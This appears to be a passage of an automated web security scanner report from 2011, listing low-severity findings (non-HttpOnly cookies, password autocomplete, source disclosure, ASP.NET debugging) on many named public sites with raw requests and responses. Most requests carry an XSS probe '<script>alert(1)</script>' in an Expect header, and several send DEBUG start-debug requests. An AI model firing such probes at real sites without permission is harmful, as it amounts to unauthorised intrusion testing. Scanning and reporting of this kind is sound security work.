Set-Cookie: surfer=CgAKDE3AypO7OgbsBS6sAg==; expires=Thu, 03-May-12 03:40:03 GMT; path=/
Accept-Ranges: bytes


15.286. http://www.wor710.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wor710.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wor710.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:24:07 GMT
Server: Apache/1.3.29 (Unix) mod_gzip/1.3.26.1a PHP/4.2.3
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerRadio_Pool=2433763395.20480.0000; path=/
Content-Length: 437

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.287. http://www.worden.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.worden.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worden.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:57:27 GMT
Content-Length: 60
Set-Cookie: BIGipServerworden.com=2852784650.20480.0000; path=/

The page cannot be displayed because the expectation failed.

15.288. http://www.xteenultra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xteenultra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xteenultra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:12:24 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: faceID=1; expires=Wed, 18-May-2011 01:12:24 GMT
Set-Cookie: TM_CJ_TID=1; path=/
Set-Cookie: TM_CJ_UNIQUE=a5ff62c685a33c24f1f3a1799125236c; path=/
Cache-Control: no-cashe, must-revalidate
Pragma: no-cache
Content-Length: 17256


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script language="JavaScript">
document.cookie='JTM_CJ_TID=1;path=/';
document.cookie='JTM_CJ_UNIQUE=a5ff62c685a33c24f1f3a179912
...[SNIP]...

15.289. http://www.yellowairplane.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yellowairplane.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowairplane.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:07:07 GMT
Content-Length: 4452
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: BlueStripe.PVN=1e2000015d51; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
   font-family:Arial, Arial, Helvetica, sans-serif;
   font-size
...[SNIP]...

15.290. http://www.zimbra.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zimbra.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zimbra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:54:00 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 468
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerwww-zimbra-prod-web-pool=2705223946.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.291. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099 HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=8C581B03B202A0310D45F935B233EBC0; _xguid=5AB157F7D0512CDEC732624704EA9852; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Wed, 04 May 2011 01:12:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:12:32 GMT
Connection: close
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Sat, 03-May-2014 01:12:32 GMT; Path=/
Set-Cookie: _push4xgat=1304471552196; Domain=.xgraph.net; Expires=Thu, 05-May-2011 01:12:32 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;

16. Password field with autocomplete enabled  previous  next
There are 11 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


16.1. http://beam.to/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://beam.to
Path:   /login.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:06 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 3116


<html><head><title>BeamTo</title>
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table border="0" width="910" cellpadding="0" cellspaceing=
...[SNIP]...
</table>

<form action="change.asp" method="GET">
<table border="0" width="750" cellpadding="4" cellspaceing="4" align="center">
...[SNIP]...
<br><input class="textfield" name="PW" type="password" size="35" value=""></td>
...[SNIP]...

16.2. http://www.choicehotels.ca/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.choicehotels.ca
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.choicehotels.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 03:11:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<script
...[SNIP]...
</span><form id="wrapper-header:loginForm" name="wrapper-header:loginForm" method="post" onsubmit="jQuery('.error-float').hide()" action="/404">
           <script>
...[SNIP]...
</label><input id="wrapper-header:loginForm:decorateUserLoginPW:idInputP" type="password" name="wrapper-header:loginForm:decorateUserLoginPW:idInputP" value="" class="text" /></div>
...[SNIP]...

16.3. http://www.homedepotmoving.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepotmoving.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homedepotmoving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=id2mh2j0b02hrk55zv4l4hnf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:06 GMT
Content-Length: 47037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../App_T
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="404.aspx?404%3bhttp%3a%2f%2fwww.homedepotmoving.com%3a80%2ffavicon.ico" id="aspnetForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwMDUyNjYzMjgPZBYCZg9kFgICAw9kFggCAw8PZBYCHgdvbmNsaWNrBQ50aGlzLnZhbHVlPScnO2QCBA8PFgIeCEltYWdlVXJsBRwvaW1hZ2VzL3NlYXJjaF9hcnJ
...[SNIP]...
<div class="signinItem">
<input name="ctl00$ucLogin$password" type="password" maxlength="12" id="ctl00_ucLogin_password" class="signinInput" onfocus="passwordFocus('ctl00_ucLogin_password','ctl00_ucLogin_passwordText');" onblur="passwordBlur('ctl00_ucLogin_password','ctl00_ucLogin_passwordText');" style="display:none;" />
<input name="ctl00$ucLogin$passwordText" type="text" value="Password" maxlength="12" id="ctl00_ucLogin_passwordText" class="signinInput" onfocus="passwordFocus('ctl00_ucLogin_
...[SNIP]...

16.4. http://www.lol-jokes.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lol-jokes.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lol-jokes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:42:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Server: Apache/Nginx/Varnish
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=1e11cc5fdd7922098b1869d2ed387b53; expires=Fri, 27-May-2011 06:15:32 GMT; path=/
Last-Modified: Wed, 20 Oct 2010 09:54:46 GMT
ETag: "79111cf2abb5675b4c433e5f9a3e8460"
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 02:42:16 GMT
Vary: Accept-Encoding
Content-Length: 19390
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<
...[SNIP]...
<div class="content"><form action="user/login?destination=favicon.ico" method="post">
<div>
...[SNIP]...
<br />
<input type="password" class="form-password" maxlength="64" name="edit[pass]" id="edit-pass" size="15" value="" />
</div>
...[SNIP]...

16.5. http://www.nobelcom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nobelcom.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nobelcom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache,max-age=1800
Set-Cookie: JSESSIONID=abcg2Sy5PoJdmaEx9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 01:07:42 GMT
Content-Length: 30526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


   <title>Phone Cards from NobelCom.com for domestic and international use</title>
   <meta name=
...[SNIP]...
<!-- Login and Country Box -->
           <form action="https://secure01.nobelcom.com/nobelcom/jsp/accounts/login.jsp" name="flogin" id="flogin" method="post">
           <table cellspacing="0" cellpadding="0" border="0">
...[SNIP]...
<td><input type="password" name="password" size="10" maxlength="255" class=login tabindex="2"></td>
...[SNIP]...

16.6. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="lb_inner">
<form id="login_form" action="">
<table>
...[SNIP]...
<td>
<input id="login_password" name="login_password" type="password" />
</td>
...[SNIP]...

16.7. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="register_div">
<form id="register_form" action="javascript:void(0);" method="post">
<table>
...[SNIP]...
<td>
<input id="password" name="password" type="password" value="" />
</td>
...[SNIP]...
<td>
<input id="password_confirm" name="password_confirm" type="password" value="" />
</td>
...[SNIP]...

16.8. http://www.restaurantrow.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.restaurantrow.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 29823
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:37 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Missing Page : RestaurantRow.com</title>
<meta http-equiv="imagetoolbar" conte
...[SNIP]...
<div id="login_Hold"><form method="post" action="/l_redirect.cfm" onsubmit="return validateLogForm(this);">
<input type="hidden" name="ERRORPG" value="404">
...[SNIP]...
</div><input class="inputText" type="Password" name="password" value=""></div>
...[SNIP]...

16.9. http://www.se-t.net/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.se-t.net
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.se-t.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:44:15 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Keep-Alive: timeout=5
Set-Cookie: was=true; expires=Wed, 31-Dec-2014 21:00:00 GMT
Content-Length: 7560

<html>
<head>
<title>........ .. .......</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="keywords" content="....., ......... ...., ......, ....., .......
...[SNIP]...
<td>


<form action='index.php' method='post' name='frm'>
<td>
...[SNIP]...
<input type='text' name='log' STYLE='width:100;background-color:#ffffff'> .....
<input type='password' name='pas' STYLE='width:100;background-color:#ffffff'> ......


<!--
<a href='index.php?pg=2'>
...[SNIP]...

16.10. http://www.superherorelease.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.superherorelease.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superherorelease.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:37:31 GMT
Content-Length: 19560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link type="text/cs
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/404.aspx?404;http:/www.superherorelease.com:80/favicon.ico" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input name="ctl00$m_masthead$m_loginCompact$m_passwordTB" type="password" maxlength="250" id="ctl00_m_masthead_m_loginCompact_m_passwordTB" class="field" onclick="this.value='';" />
</td>
...[SNIP]...

16.11. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehealthplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: CFID=13104831;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: CFTOKEN=27842674;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: JSESSIONID=9430fb20c9531d41550077445351f367c726;path=/
Set-Cookie: COOKIESENABLED=true;expires=Thu, 05-May-2011 04:16:44 GMT;path=/
Set-Cookie: TLTSID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:44 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

           
                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<div id="miniContainer">
                   <form action="https://www.thehealthplan.com/GHPLogon/ct_logon2.cfm" method="post" name="login">                        
                           <input name="user" type="text" class="first" id="user" onfocus="doOnFocus(this);" onKeyPress="return submitenter(this,event)"/>
                           <input name="password" type="password" class="second" id="password" onfocus="doOnFocus(this);" onKeyPress="return submitenter(this,event)" />
                           <input name="timestamp" type="hidden">
...[SNIP]...

17. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


17.1. http://www.fellowes.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.fellowes.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in JSP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fellowes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 4771
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:48 GMT

<%@ Page CodeBehind="error_page.aspx.cs" Language="c#" AutoEventWireup="True" Inherits="Fellowes.site.error_page" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
...[SNIP]...

17.2. http://www.virginialottery.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.virginialottery.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.virginialottery.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 10659
Content-Type: application/octet-stream
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:00 GMT

<%
dim location, menu_select
location = ""
%>


<html>
<head>
<title>Official Home of the Virginia Lottery</title>
<meta name="description" content="The Virginia Lottery is a state-run lottery
...[SNIP]...
<td align="left" valign="bottom">
<%
           Dim ad
           Set ad = Server.CreateObject("MSWC.AdRotator")
           Response.Write(ad.GetAdvertisement("mm_banner.txt"))
           %>
</td>
...[SNIP]...

18. ASP.NET debugging enabled  previous  next
There are 77 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



18.1. http://4qinvite.4q.iperceptions.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: 4qinvite.4q.iperceptions.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:14:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.2. http://km6633.keymetric.net/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://km6633.keymetric.net
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: km6633.keymetric.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:14:05 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18.3. http://www.211.org/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.211.org
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.211.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Wed, 04 May 2011 01:35:28 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
